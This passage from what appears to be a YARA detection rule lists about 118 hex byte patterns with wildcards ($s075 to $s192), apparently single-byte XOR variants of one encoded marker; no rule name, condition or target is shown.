$s075 = { 4B 4A 4B 4A 4B 49 ?? ?? 4B 49 4B 4A 4B 49 ?? ?? 4B 48 4B 49 4B 4F ?? ?? ?? ?? 4B 4F 4B 49 4B 4F ?? ?? ?? ?? 4B 4E 4B 4A 4B 49 ?? ?? }
$s076 = { 4C 4D 4C 4D 4C 4E ?? ?? 4C 4E 4C 4D 4C 4E ?? ?? 4C 4F 4C 4E 4C 48 ?? ?? ?? ?? 4C 48 4C 4E 4C 48 ?? ?? ?? ?? 4C 49 4C 4D 4C 4E ?? ?? }
$s077 = { 4D 4C 4D 4C 4D 4F ?? ?? 4D 4F 4D 4C 4D 4F ?? ?? 4D 4E 4D 4F 4D 49 ?? ?? ?? ?? 4D 49 4D 4F 4D 49 ?? ?? ?? ?? 4D 48 4D 4C 4D 4F ?? ?? }
$s078 = { 4E 4F 4E 4F 4E 4C ?? ?? 4E 4C 4E 4F 4E 4C ?? ?? 4E 4D 4E 4C 4E 4A ?? ?? ?? ?? 4E 4A 4E 4C 4E 4A ?? ?? ?? ?? 4E 4B 4E 4F 4E 4C ?? ?? }
$s079 = { 4F 4E 4F 4E 4F 4D ?? ?? 4F 4D 4F 4E 4F 4D ?? ?? 4F 4C 4F 4D 4F 4B ?? ?? ?? ?? 4F 4B 4F 4D 4F 4B ?? ?? ?? ?? 4F 4A 4F 4E 4F 4D ?? ?? }
$s080 = { 50 51 50 51 50 52 ?? ?? 50 52 50 51 50 52 ?? ?? 50 53 50 52 50 54 ?? ?? ?? ?? 50 54 50 52 50 54 ?? ?? ?? ?? 50 55 50 51 50 52 ?? ?? }
$s081 = { 51 50 51 50 51 53 ?? ?? 51 53 51 50 51 53 ?? ?? 51 52 51 53 51 55 ?? ?? ?? ?? 51 55 51 53 51 55 ?? ?? ?? ?? 51 54 51 50 51 53 ?? ?? }
$s082 = { 52 53 52 53 52 50 ?? ?? 52 50 52 53 52 50 ?? ?? 52 51 52 50 52 56 ?? ?? ?? ?? 52 56 52 50 52 56 ?? ?? ?? ?? 52 57 52 53 52 50 ?? ?? }
$s083 = { 53 52 53 52 53 51 ?? ?? 53 51 53 52 53 51 ?? ?? 53 50 53 51 53 57 ?? ?? ?? ?? 53 57 53 51 53 57 ?? ?? ?? ?? 53 56 53 52 53 51 ?? ?? }
$s084 = { 54 55 54 55 54 56 ?? ?? 54 56 54 55 54 56 ?? ?? 54 57 54 56 54 50 ?? ?? ?? ?? 54 50 54 56 54 50 ?? ?? ?? ?? 54 51 54 55 54 56 ?? ?? }
$s085 = { 55 54 55 54 55 57 ?? ?? 55 57 55 54 55 57 ?? ?? 55 56 55 57 55 51 ?? ?? ?? ?? 55 51 55 57 55 51 ?? ?? ?? ?? 55 50 55 54 55 57 ?? ?? }
$s086 = { 56 57 56 57 56 54 ?? ?? 56 54 56 57 56 54 ?? ?? 56 55 56 54 56 52 ?? ?? ?? ?? 56 52 56 54 56 52 ?? ?? ?? ?? 56 53 56 57 56 54 ?? ?? }
$s087 = { 57 56 57 56 57 55 ?? ?? 57 55 57 56 57 55 ?? ?? 57 54 57 55 57 53 ?? ?? ?? ?? 57 53 57 55 57 53 ?? ?? ?? ?? 57 52 57 56 57 55 ?? ?? }
$s088 = { 58 59 58 59 58 5A ?? ?? 58 5A 58 59 58 5A ?? ?? 58 5B 58 5A 58 5C ?? ?? ?? ?? 58 5C 58 5A 58 5C ?? ?? ?? ?? 58 5D 58 59 58 5A ?? ?? }
$s089 = { 59 58 59 58 59 5B ?? ?? 59 5B 59 58 59 5B ?? ?? 59 5A 59 5B 59 5D ?? ?? ?? ?? 59 5D 59 5B 59 5D ?? ?? ?? ?? 59 5C 59 58 59 5B ?? ?? }
$s090 = { 5A 5B 5A 5B 5A 58 ?? ?? 5A 58 5A 5B 5A 58 ?? ?? 5A 59 5A 58 5A 5E ?? ?? ?? ?? 5A 5E 5A 58 5A 5E ?? ?? ?? ?? 5A 5F 5A 5B 5A 58 ?? ?? }
$s091 = { 5B 5A 5B 5A 5B 59 ?? ?? 5B 59 5B 5A 5B 59 ?? ?? 5B 58 5B 59 5B 5F ?? ?? ?? ?? 5B 5F 5B 59 5B 5F ?? ?? ?? ?? 5B 5E 5B 5A 5B 59 ?? ?? }
$s092 = { 5C 5D 5C 5D 5C 5E ?? ?? 5C 5E 5C 5D 5C 5E ?? ?? 5C 5F 5C 5E 5C 58 ?? ?? ?? ?? 5C 58 5C 5E 5C 58 ?? ?? ?? ?? 5C 59 5C 5D 5C 5E ?? ?? }
$s093 = { 5D 5C 5D 5C 5D 5F ?? ?? 5D 5F 5D 5C 5D 5F ?? ?? 5D 5E 5D 5F 5D 59 ?? ?? ?? ?? 5D 59 5D 5F 5D 59 ?? ?? ?? ?? 5D 58 5D 5C 5D 5F ?? ?? }
$s094 = { 5E 5F 5E 5F 5E 5C ?? ?? 5E 5C 5E 5F 5E 5C ?? ?? 5E 5D 5E 5C 5E 5A ?? ?? ?? ?? 5E 5A 5E 5C 5E 5A ?? ?? ?? ?? 5E 5B 5E 5F 5E 5C ?? ?? }
$s095 = { 5F 5E 5F 5E 5F 5D ?? ?? 5F 5D 5F 5E 5F 5D ?? ?? 5F 5C 5F 5D 5F 5B ?? ?? ?? ?? 5F 5B 5F 5D 5F 5B ?? ?? ?? ?? 5F 5A 5F 5E 5F 5D ?? ?? }
$s096 = { 60 61 60 61 60 62 ?? ?? 60 62 60 61 60 62 ?? ?? 60 63 60 62 60 64 ?? ?? ?? ?? 60 64 60 62 60 64 ?? ?? ?? ?? 60 65 60 61 60 62 ?? ?? }
$s097 = { 61 60 61 60 61 63 ?? ?? 61 63 61 60 61 63 ?? ?? 61 62 61 63 61 65 ?? ?? ?? ?? 61 65 61 63 61 65 ?? ?? ?? ?? 61 64 61 60 61 63 ?? ?? }
$s098 = { 62 63 62 63 62 60 ?? ?? 62 60 62 63 62 60 ?? ?? 62 61 62 60 62 66 ?? ?? ?? ?? 62 66 62 60 62 66 ?? ?? ?? ?? 62 67 62 63 62 60 ?? ?? }
$s099 = { 63 62 63 62 63 61 ?? ?? 63 61 63 62 63 61 ?? ?? 63 60 63 61 63 67 ?? ?? ?? ?? 63 67 63 61 63 67 ?? ?? ?? ?? 63 66 63 62 63 61 ?? ?? }
$s100 = { 64 65 64 65 64 66 ?? ?? 64 66 64 65 64 66 ?? ?? 64 67 64 66 64 60 ?? ?? ?? ?? 64 60 64 66 64 60 ?? ?? ?? ?? 64 61 64 65 64 66 ?? ?? }
$s101 = { 65 64 65 64 65 67 ?? ?? 65 67 65 64 65 67 ?? ?? 65 66 65 67 65 61 ?? ?? ?? ?? 65 61 65 67 65 61 ?? ?? ?? ?? 65 60 65 64 65 67 ?? ?? }
$s102 = { 66 67 66 67 66 64 ?? ?? 66 64 66 67 66 64 ?? ?? 66 65 66 64 66 62 ?? ?? ?? ?? 66 62 66 64 66 62 ?? ?? ?? ?? 66 63 66 67 66 64 ?? ?? }
$s103 = { 67 66 67 66 67 65 ?? ?? 67 65 67 66 67 65 ?? ?? 67 64 67 65 67 63 ?? ?? ?? ?? 67 63 67 65 67 63 ?? ?? ?? ?? 67 62 67 66 67 65 ?? ?? }
$s104 = { 68 69 68 69 68 6A ?? ?? 68 6A 68 69 68 6A ?? ?? 68 6B 68 6A 68 6C ?? ?? ?? ?? 68 6C 68 6A 68 6C ?? ?? ?? ?? 68 6D 68 69 68 6A ?? ?? }
$s105 = { 69 68 69 68 69 6B ?? ?? 69 6B 69 68 69 6B ?? ?? 69 6A 69 6B 69 6D ?? ?? ?? ?? 69 6D 69 6B 69 6D ?? ?? ?? ?? 69 6C 69 68 69 6B ?? ?? }
$s106 = { 6A 6B 6A 6B 6A 68 ?? ?? 6A 68 6A 6B 6A 68 ?? ?? 6A 69 6A 68 6A 6E ?? ?? ?? ?? 6A 6E 6A 68 6A 6E ?? ?? ?? ?? 6A 6F 6A 6B 6A 68 ?? ?? }
$s107 = { 6B 6A 6B 6A 6B 69 ?? ?? 6B 69 6B 6A 6B 69 ?? ?? 6B 68 6B 69 6B 6F ?? ?? ?? ?? 6B 6F 6B 69 6B 6F ?? ?? ?? ?? 6B 6E 6B 6A 6B 69 ?? ?? }
$s108 = { 6C 6D 6C 6D 6C 6E ?? ?? 6C 6E 6C 6D 6C 6E ?? ?? 6C 6F 6C 6E 6C 68 ?? ?? ?? ?? 6C 68 6C 6E 6C 68 ?? ?? ?? ?? 6C 69 6C 6D 6C 6E ?? ?? }
$s109 = { 6D 6C 6D 6C 6D 6F ?? ?? 6D 6F 6D 6C 6D 6F ?? ?? 6D 6E 6D 6F 6D 69 ?? ?? ?? ?? 6D 69 6D 6F 6D 69 ?? ?? ?? ?? 6D 68 6D 6C 6D 6F ?? ?? }
$s110 = { 6E 6F 6E 6F 6E 6C ?? ?? 6E 6C 6E 6F 6E 6C ?? ?? 6E 6D 6E 6C 6E 6A ?? ?? ?? ?? 6E 6A 6E 6C 6E 6A ?? ?? ?? ?? 6E 6B 6E 6F 6E 6C ?? ?? }
$s111 = { 6F 6E 6F 6E 6F 6D ?? ?? 6F 6D 6F 6E 6F 6D ?? ?? 6F 6C 6F 6D 6F 6B ?? ?? ?? ?? 6F 6B 6F 6D 6F 6B ?? ?? ?? ?? 6F 6A 6F 6E 6F 6D ?? ?? }
$s112 = { 70 71 70 71 70 72 ?? ?? 70 72 70 71 70 72 ?? ?? 70 73 70 72 70 74 ?? ?? ?? ?? 70 74 70 72 70 74 ?? ?? ?? ?? 70 75 70 71 70 72 ?? ?? }
$s113 = { 71 70 71 70 71 73 ?? ?? 71 73 71 70 71 73 ?? ?? 71 72 71 73 71 75 ?? ?? ?? ?? 71 75 71 73 71 75 ?? ?? ?? ?? 71 74 71 70 71 73 ?? ?? }
$s114 = { 72 73 72 73 72 70 ?? ?? 72 70 72 73 72 70 ?? ?? 72 71 72 70 72 76 ?? ?? ?? ?? 72 76 72 70 72 76 ?? ?? ?? ?? 72 77 72 73 72 70 ?? ?? }
$s115 = { 73 72 73 72 73 71 ?? ?? 73 71 73 72 73 71 ?? ?? 73 70 73 71 73 77 ?? ?? ?? ?? 73 77 73 71 73 77 ?? ?? ?? ?? 73 76 73 72 73 71 ?? ?? }
$s116 = { 74 75 74 75 74 76 ?? ?? 74 76 74 75 74 76 ?? ?? 74 77 74 76 74 70 ?? ?? ?? ?? 74 70 74 76 74 70 ?? ?? ?? ?? 74 71 74 75 74 76 ?? ?? }
$s117 = { 75 74 75 74 75 77 ?? ?? 75 77 75 74 75 77 ?? ?? 75 76 75 77 75 71 ?? ?? ?? ?? 75 71 75 77 75 71 ?? ?? ?? ?? 75 70 75 74 75 77 ?? ?? }
$s118 = { 76 77 76 77 76 74 ?? ?? 76 74 76 77 76 74 ?? ?? 76 75 76 74 76 72 ?? ?? ?? ?? 76 72 76 74 76 72 ?? ?? ?? ?? 76 73 76 77 76 74 ?? ?? }
$s119 = { 77 76 77 76 77 75 ?? ?? 77 75 77 76 77 75 ?? ?? 77 74 77 75 77 73 ?? ?? ?? ?? 77 73 77 75 77 73 ?? ?? ?? ?? 77 72 77 76 77 75 ?? ?? }
$s120 = { 78 79 78 79 78 7A ?? ?? 78 7A 78 79 78 7A ?? ?? 78 7B 78 7A 78 7C ?? ?? ?? ?? 78 7C 78 7A 78 7C ?? ?? ?? ?? 78 7D 78 79 78 7A ?? ?? }
$s121 = { 79 78 79 78 79 7B ?? ?? 79 7B 79 78 79 7B ?? ?? 79 7A 79 7B 79 7D ?? ?? ?? ?? 79 7D 79 7B 79 7D ?? ?? ?? ?? 79 7C 79 78 79 7B ?? ?? }
$s122 = { 7A 7B 7A 7B 7A 78 ?? ?? 7A 78 7A 7B 7A 78 ?? ?? 7A 79 7A 78 7A 7E ?? ?? ?? ?? 7A 7E 7A 78 7A 7E ?? ?? ?? ?? 7A 7F 7A 7B 7A 78 ?? ?? }
$s123 = { 7B 7A 7B 7A 7B 79 ?? ?? 7B 79 7B 7A 7B 79 ?? ?? 7B 78 7B 79 7B 7F ?? ?? ?? ?? 7B 7F 7B 79 7B 7F ?? ?? ?? ?? 7B 7E 7B 7A 7B 79 ?? ?? }
$s124 = { 7C 7D 7C 7D 7C 7E ?? ?? 7C 7E 7C 7D 7C 7E ?? ?? 7C 7F 7C 7E 7C 78 ?? ?? ?? ?? 7C 78 7C 7E 7C 78 ?? ?? ?? ?? 7C 79 7C 7D 7C 7E ?? ?? }
$s125 = { 7D 7C 7D 7C 7D 7F ?? ?? 7D 7F 7D 7C 7D 7F ?? ?? 7D 7E 7D 7F 7D 79 ?? ?? ?? ?? 7D 79 7D 7F 7D 79 ?? ?? ?? ?? 7D 78 7D 7C 7D 7F ?? ?? }
$s126 = { 7E 7F 7E 7F 7E 7C ?? ?? 7E 7C 7E 7F 7E 7C ?? ?? 7E 7D 7E 7C 7E 7A ?? ?? ?? ?? 7E 7A 7E 7C 7E 7A ?? ?? ?? ?? 7E 7B 7E 7F 7E 7C ?? ?? }
$s127 = { 7F 7E 7F 7E 7F 7D ?? ?? 7F 7D 7F 7E 7F 7D ?? ?? 7F 7C 7F 7D 7F 7B ?? ?? ?? ?? 7F 7B 7F 7D 7F 7B ?? ?? ?? ?? 7F 7A 7F 7E 7F 7D ?? ?? }
$s128 = { 80 81 80 81 80 82 ?? ?? 80 82 80 81 80 82 ?? ?? 80 83 80 82 80 84 ?? ?? ?? ?? 80 84 80 82 80 84 ?? ?? ?? ?? 80 85 80 81 80 82 ?? ?? }
$s129 = { 81 80 81 80 81 83 ?? ?? 81 83 81 80 81 83 ?? ?? 81 82 81 83 81 85 ?? ?? ?? ?? 81 85 81 83 81 85 ?? ?? ?? ?? 81 84 81 80 81 83 ?? ?? }
$s130 = { 82 83 82 83 82 80 ?? ?? 82 80 82 83 82 80 ?? ?? 82 81 82 80 82 86 ?? ?? ?? ?? 82 86 82 80 82 86 ?? ?? ?? ?? 82 87 82 83 82 80 ?? ?? }
$s131 = { 83 82 83 82 83 81 ?? ?? 83 81 83 82 83 81 ?? ?? 83 80 83 81 83 87 ?? ?? ?? ?? 83 87 83 81 83 87 ?? ?? ?? ?? 83 86 83 82 83 81 ?? ?? }
$s132 = { 84 85 84 85 84 86 ?? ?? 84 86 84 85 84 86 ?? ?? 84 87 84 86 84 80 ?? ?? ?? ?? 84 80 84 86 84 80 ?? ?? ?? ?? 84 81 84 85 84 86 ?? ?? }
$s133 = { 85 84 85 84 85 87 ?? ?? 85 87 85 84 85 87 ?? ?? 85 86 85 87 85 81 ?? ?? ?? ?? 85 81 85 87 85 81 ?? ?? ?? ?? 85 80 85 84 85 87 ?? ?? }
$s134 = { 86 87 86 87 86 84 ?? ?? 86 84 86 87 86 84 ?? ?? 86 85 86 84 86 82 ?? ?? ?? ?? 86 82 86 84 86 82 ?? ?? ?? ?? 86 83 86 87 86 84 ?? ?? }
$s135 = { 87 86 87 86 87 85 ?? ?? 87 85 87 86 87 85 ?? ?? 87 84 87 85 87 83 ?? ?? ?? ?? 87 83 87 85 87 83 ?? ?? ?? ?? 87 82 87 86 87 85 ?? ?? }
$s136 = { 88 89 88 89 88 8A ?? ?? 88 8A 88 89 88 8A ?? ?? 88 8B 88 8A 88 8C ?? ?? ?? ?? 88 8C 88 8A 88 8C ?? ?? ?? ?? 88 8D 88 89 88 8A ?? ?? }
$s137 = { 89 88 89 88 89 8B ?? ?? 89 8B 89 88 89 8B ?? ?? 89 8A 89 8B 89 8D ?? ?? ?? ?? 89 8D 89 8B 89 8D ?? ?? ?? ?? 89 8C 89 88 89 8B ?? ?? }
$s138 = { 8A 8B 8A 8B 8A 88 ?? ?? 8A 88 8A 8B 8A 88 ?? ?? 8A 89 8A 88 8A 8E ?? ?? ?? ?? 8A 8E 8A 88 8A 8E ?? ?? ?? ?? 8A 8F 8A 8B 8A 88 ?? ?? }
$s139 = { 8B 8A 8B 8A 8B 89 ?? ?? 8B 89 8B 8A 8B 89 ?? ?? 8B 88 8B 89 8B 8F ?? ?? ?? ?? 8B 8F 8B 89 8B 8F ?? ?? ?? ?? 8B 8E 8B 8A 8B 89 ?? ?? }
$s140 = { 8C 8D 8C 8D 8C 8E ?? ?? 8C 8E 8C 8D 8C 8E ?? ?? 8C 8F 8C 8E 8C 88 ?? ?? ?? ?? 8C 88 8C 8E 8C 88 ?? ?? ?? ?? 8C 89 8C 8D 8C 8E ?? ?? }
$s141 = { 8D 8C 8D 8C 8D 8F ?? ?? 8D 8F 8D 8C 8D 8F ?? ?? 8D 8E 8D 8F 8D 89 ?? ?? ?? ?? 8D 89 8D 8F 8D 89 ?? ?? ?? ?? 8D 88 8D 8C 8D 8F ?? ?? }
$s142 = { 8E 8F 8E 8F 8E 8C ?? ?? 8E 8C 8E 8F 8E 8C ?? ?? 8E 8D 8E 8C 8E 8A ?? ?? ?? ?? 8E 8A 8E 8C 8E 8A ?? ?? ?? ?? 8E 8B 8E 8F 8E 8C ?? ?? }
$s143 = { 8F 8E 8F 8E 8F 8D ?? ?? 8F 8D 8F 8E 8F 8D ?? ?? 8F 8C 8F 8D 8F 8B ?? ?? ?? ?? 8F 8B 8F 8D 8F 8B ?? ?? ?? ?? 8F 8A 8F 8E 8F 8D ?? ?? }
$s144 = { 90 91 90 91 90 92 ?? ?? 90 92 90 91 90 92 ?? ?? 90 93 90 92 90 94 ?? ?? ?? ?? 90 94 90 92 90 94 ?? ?? ?? ?? 90 95 90 91 90 92 ?? ?? }
$s145 = { 91 90 91 90 91 93 ?? ?? 91 93 91 90 91 93 ?? ?? 91 92 91 93 91 95 ?? ?? ?? ?? 91 95 91 93 91 95 ?? ?? ?? ?? 91 94 91 90 91 93 ?? ?? }
$s146 = { 92 93 92 93 92 90 ?? ?? 92 90 92 93 92 90 ?? ?? 92 91 92 90 92 96 ?? ?? ?? ?? 92 96 92 90 92 96 ?? ?? ?? ?? 92 97 92 93 92 90 ?? ?? }
$s147 = { 93 92 93 92 93 91 ?? ?? 93 91 93 92 93 91 ?? ?? 93 90 93 91 93 97 ?? ?? ?? ?? 93 97 93 91 93 97 ?? ?? ?? ?? 93 96 93 92 93 91 ?? ?? }
$s148 = { 94 95 94 95 94 96 ?? ?? 94 96 94 95 94 96 ?? ?? 94 97 94 96 94 90 ?? ?? ?? ?? 94 90 94 96 94 90 ?? ?? ?? ?? 94 91 94 95 94 96 ?? ?? }
$s149 = { 95 94 95 94 95 97 ?? ?? 95 97 95 94 95 97 ?? ?? 95 96 95 97 95 91 ?? ?? ?? ?? 95 91 95 97 95 91 ?? ?? ?? ?? 95 90 95 94 95 97 ?? ?? }
$s150 = { 96 97 96 97 96 94 ?? ?? 96 94 96 97 96 94 ?? ?? 96 95 96 94 96 92 ?? ?? ?? ?? 96 92 96 94 96 92 ?? ?? ?? ?? 96 93 96 97 96 94 ?? ?? }
$s151 = { 97 96 97 96 97 95 ?? ?? 97 95 97 96 97 95 ?? ?? 97 94 97 95 97 93 ?? ?? ?? ?? 97 93 97 95 97 93 ?? ?? ?? ?? 97 92 97 96 97 95 ?? ?? }
$s152 = { 98 99 98 99 98 9A ?? ?? 98 9A 98 99 98 9A ?? ?? 98 9B 98 9A 98 9C ?? ?? ?? ?? 98 9C 98 9A 98 9C ?? ?? ?? ?? 98 9D 98 99 98 9A ?? ?? }
$s153 = { 99 98 99 98 99 9B ?? ?? 99 9B 99 98 99 9B ?? ?? 99 9A 99 9B 99 9D ?? ?? ?? ?? 99 9D 99 9B 99 9D ?? ?? ?? ?? 99 9C 99 98 99 9B ?? ?? }
$s154 = { 9A 9B 9A 9B 9A 98 ?? ?? 9A 98 9A 9B 9A 98 ?? ?? 9A 99 9A 98 9A 9E ?? ?? ?? ?? 9A 9E 9A 98 9A 9E ?? ?? ?? ?? 9A 9F 9A 9B 9A 98 ?? ?? }
$s155 = { 9B 9A 9B 9A 9B 99 ?? ?? 9B 99 9B 9A 9B 99 ?? ?? 9B 98 9B 99 9B 9F ?? ?? ?? ?? 9B 9F 9B 99 9B 9F ?? ?? ?? ?? 9B 9E 9B 9A 9B 99 ?? ?? }
$s156 = { 9C 9D 9C 9D 9C 9E ?? ?? 9C 9E 9C 9D 9C 9E ?? ?? 9C 9F 9C 9E 9C 98 ?? ?? ?? ?? 9C 98 9C 9E 9C 98 ?? ?? ?? ?? 9C 99 9C 9D 9C 9E ?? ?? }
$s157 = { 9D 9C 9D 9C 9D 9F ?? ?? 9D 9F 9D 9C 9D 9F ?? ?? 9D 9E 9D 9F 9D 99 ?? ?? ?? ?? 9D 99 9D 9F 9D 99 ?? ?? ?? ?? 9D 98 9D 9C 9D 9F ?? ?? }
$s158 = { 9E 9F 9E 9F 9E 9C ?? ?? 9E 9C 9E 9F 9E 9C ?? ?? 9E 9D 9E 9C 9E 9A ?? ?? ?? ?? 9E 9A 9E 9C 9E 9A ?? ?? ?? ?? 9E 9B 9E 9F 9E 9C ?? ?? }
$s159 = { 9F 9E 9F 9E 9F 9D ?? ?? 9F 9D 9F 9E 9F 9D ?? ?? 9F 9C 9F 9D 9F 9B ?? ?? ?? ?? 9F 9B 9F 9D 9F 9B ?? ?? ?? ?? 9F 9A 9F 9E 9F 9D ?? ?? }
$s160 = { A0 A1 A0 A1 A0 A2 ?? ?? A0 A2 A0 A1 A0 A2 ?? ?? A0 A3 A0 A2 A0 A4 ?? ?? ?? ?? A0 A4 A0 A2 A0 A4 ?? ?? ?? ?? A0 A5 A0 A1 A0 A2 ?? ?? }
$s161 = { A1 A0 A1 A0 A1 A3 ?? ?? A1 A3 A1 A0 A1 A3 ?? ?? A1 A2 A1 A3 A1 A5 ?? ?? ?? ?? A1 A5 A1 A3 A1 A5 ?? ?? ?? ?? A1 A4 A1 A0 A1 A3 ?? ?? }
$s162 = { A2 A3 A2 A3 A2 A0 ?? ?? A2 A0 A2 A3 A2 A0 ?? ?? A2 A1 A2 A0 A2 A6 ?? ?? ?? ?? A2 A6 A2 A0 A2 A6 ?? ?? ?? ?? A2 A7 A2 A3 A2 A0 ?? ?? }
$s163 = { A3 A2 A3 A2 A3 A1 ?? ?? A3 A1 A3 A2 A3 A1 ?? ?? A3 A0 A3 A1 A3 A7 ?? ?? ?? ?? A3 A7 A3 A1 A3 A7 ?? ?? ?? ?? A3 A6 A3 A2 A3 A1 ?? ?? }
$s164 = { A4 A5 A4 A5 A4 A6 ?? ?? A4 A6 A4 A5 A4 A6 ?? ?? A4 A7 A4 A6 A4 A0 ?? ?? ?? ?? A4 A0 A4 A6 A4 A0 ?? ?? ?? ?? A4 A1 A4 A5 A4 A6 ?? ?? }
$s165 = { A5 A4 A5 A4 A5 A7 ?? ?? A5 A7 A5 A4 A5 A7 ?? ?? A5 A6 A5 A7 A5 A1 ?? ?? ?? ?? A5 A1 A5 A7 A5 A1 ?? ?? ?? ?? A5 A0 A5 A4 A5 A7 ?? ?? }
$s166 = { A6 A7 A6 A7 A6 A4 ?? ?? A6 A4 A6 A7 A6 A4 ?? ?? A6 A5 A6 A4 A6 A2 ?? ?? ?? ?? A6 A2 A6 A4 A6 A2 ?? ?? ?? ?? A6 A3 A6 A7 A6 A4 ?? ?? }
$s167 = { A7 A6 A7 A6 A7 A5 ?? ?? A7 A5 A7 A6 A7 A5 ?? ?? A7 A4 A7 A5 A7 A3 ?? ?? ?? ?? A7 A3 A7 A5 A7 A3 ?? ?? ?? ?? A7 A2 A7 A6 A7 A5 ?? ?? }
$s168 = { A8 A9 A8 A9 A8 AA ?? ?? A8 AA A8 A9 A8 AA ?? ?? A8 AB A8 AA A8 AC ?? ?? ?? ?? A8 AC A8 AA A8 AC ?? ?? ?? ?? A8 AD A8 A9 A8 AA ?? ?? }
$s169 = { A9 A8 A9 A8 A9 AB ?? ?? A9 AB A9 A8 A9 AB ?? ?? A9 AA A9 AB A9 AD ?? ?? ?? ?? A9 AD A9 AB A9 AD ?? ?? ?? ?? A9 AC A9 A8 A9 AB ?? ?? }
$s170 = { AA AB AA AB AA A8 ?? ?? AA A8 AA AB AA A8 ?? ?? AA A9 AA A8 AA AE ?? ?? ?? ?? AA AE AA A8 AA AE ?? ?? ?? ?? AA AF AA AB AA A8 ?? ?? }
$s171 = { AB AA AB AA AB A9 ?? ?? AB A9 AB AA AB A9 ?? ?? AB A8 AB A9 AB AF ?? ?? ?? ?? AB AF AB A9 AB AF ?? ?? ?? ?? AB AE AB AA AB A9 ?? ?? }
$s172 = { AC AD AC AD AC AE ?? ?? AC AE AC AD AC AE ?? ?? AC AF AC AE AC A8 ?? ?? ?? ?? AC A8 AC AE AC A8 ?? ?? ?? ?? AC A9 AC AD AC AE ?? ?? }
$s173 = { AD AC AD AC AD AF ?? ?? AD AF AD AC AD AF ?? ?? AD AE AD AF AD A9 ?? ?? ?? ?? AD A9 AD AF AD A9 ?? ?? ?? ?? AD A8 AD AC AD AF ?? ?? }
$s174 = { AE AF AE AF AE AC ?? ?? AE AC AE AF AE AC ?? ?? AE AD AE AC AE AA ?? ?? ?? ?? AE AA AE AC AE AA ?? ?? ?? ?? AE AB AE AF AE AC ?? ?? }
$s175 = { AF AE AF AE AF AD ?? ?? AF AD AF AE AF AD ?? ?? AF AC AF AD AF AB ?? ?? ?? ?? AF AB AF AD AF AB ?? ?? ?? ?? AF AA AF AE AF AD ?? ?? }
$s176 = { B0 B1 B0 B1 B0 B2 ?? ?? B0 B2 B0 B1 B0 B2 ?? ?? B0 B3 B0 B2 B0 B4 ?? ?? ?? ?? B0 B4 B0 B2 B0 B4 ?? ?? ?? ?? B0 B5 B0 B1 B0 B2 ?? ?? }
$s177 = { B1 B0 B1 B0 B1 B3 ?? ?? B1 B3 B1 B0 B1 B3 ?? ?? B1 B2 B1 B3 B1 B5 ?? ?? ?? ?? B1 B5 B1 B3 B1 B5 ?? ?? ?? ?? B1 B4 B1 B0 B1 B3 ?? ?? }
$s178 = { B2 B3 B2 B3 B2 B0 ?? ?? B2 B0 B2 B3 B2 B0 ?? ?? B2 B1 B2 B0 B2 B6 ?? ?? ?? ?? B2 B6 B2 B0 B2 B6 ?? ?? ?? ?? B2 B7 B2 B3 B2 B0 ?? ?? }
$s179 = { B3 B2 B3 B2 B3 B1 ?? ?? B3 B1 B3 B2 B3 B1 ?? ?? B3 B0 B3 B1 B3 B7 ?? ?? ?? ?? B3 B7 B3 B1 B3 B7 ?? ?? ?? ?? B3 B6 B3 B2 B3 B1 ?? ?? }
$s180 = { B4 B5 B4 B5 B4 B6 ?? ?? B4 B6 B4 B5 B4 B6 ?? ?? B4 B7 B4 B6 B4 B0 ?? ?? ?? ?? B4 B0 B4 B6 B4 B0 ?? ?? ?? ?? B4 B1 B4 B5 B4 B6 ?? ?? }
$s181 = { B5 B4 B5 B4 B5 B7 ?? ?? B5 B7 B5 B4 B5 B7 ?? ?? B5 B6 B5 B7 B5 B1 ?? ?? ?? ?? B5 B1 B5 B7 B5 B1 ?? ?? ?? ?? B5 B0 B5 B4 B5 B7 ?? ?? }
$s182 = { B6 B7 B6 B7 B6 B4 ?? ?? B6 B4 B6 B7 B6 B4 ?? ?? B6 B5 B6 B4 B6 B2 ?? ?? ?? ?? B6 B2 B6 B4 B6 B2 ?? ?? ?? ?? B6 B3 B6 B7 B6 B4 ?? ?? }
$s183 = { B7 B6 B7 B6 B7 B5 ?? ?? B7 B5 B7 B6 B7 B5 ?? ?? B7 B4 B7 B5 B7 B3 ?? ?? ?? ?? B7 B3 B7 B5 B7 B3 ?? ?? ?? ?? B7 B2 B7 B6 B7 B5 ?? ?? }
$s184 = { B8 B9 B8 B9 B8 BA ?? ?? B8 BA B8 B9 B8 BA ?? ?? B8 BB B8 BA B8 BC ?? ?? ?? ?? B8 BC B8 BA B8 BC ?? ?? ?? ?? B8 BD B8 B9 B8 BA ?? ?? }
$s185 = { B9 B8 B9 B8 B9 BB ?? ?? B9 BB B9 B8 B9 BB ?? ?? B9 BA B9 BB B9 BD ?? ?? ?? ?? B9 BD B9 BB B9 BD ?? ?? ?? ?? B9 BC B9 B8 B9 BB ?? ?? }
$s186 = { BA BB BA BB BA B8 ?? ?? BA B8 BA BB BA B8 ?? ?? BA B9 BA B8 BA BE ?? ?? ?? ?? BA BE BA B8 BA BE ?? ?? ?? ?? BA BF BA BB BA B8 ?? ?? }
$s187 = { BB BA BB BA BB B9 ?? ?? BB B9 BB BA BB B9 ?? ?? BB B8 BB B9 BB BF ?? ?? ?? ?? BB BF BB B9 BB BF ?? ?? ?? ?? BB BE BB BA BB B9 ?? ?? }
$s188 = { BC BD BC BD BC BE ?? ?? BC BE BC BD BC BE ?? ?? BC BF BC BE BC B8 ?? ?? ?? ?? BC B8 BC BE BC B8 ?? ?? ?? ?? BC B9 BC BD BC BE ?? ?? }
$s189 = { BD BC BD BC BD BF ?? ?? BD BF BD BC BD BF ?? ?? BD BE BD BF BD B9 ?? ?? ?? ?? BD B9 BD BF BD B9 ?? ?? ?? ?? BD B8 BD BC BD BF ?? ?? }
$s190 = { BE BF BE BF BE BC ?? ?? BE BC BE BF BE BC ?? ?? BE BD BE BC BE BA ?? ?? ?? ?? BE BA BE BC BE BA ?? ?? ?? ?? BE BB BE BF BE BC ?? ?? }
$s191 = { BF BE BF BE BF BD ?? ?? BF BD BF BE BF BD ?? ?? BF BC BF BD BF BB ?? ?? ?? ?? BF BB BF BD BF BB ?? ?? ?? ?? BF BA BF BE BF BD ?? ?? }
$s192 = { C0 C1 C0 C1 C0 C2 ?? ?? C0 C2 C0 C1 C0 C2 ?? ?? C0 C3 C0 C2 C0 C4 ?? ?? ?? ?? C0 C4 C0 C2 C0 C4 ?? ?? ?? ?? C0 C5 C0 C1 C0 C2 ?? ?? }
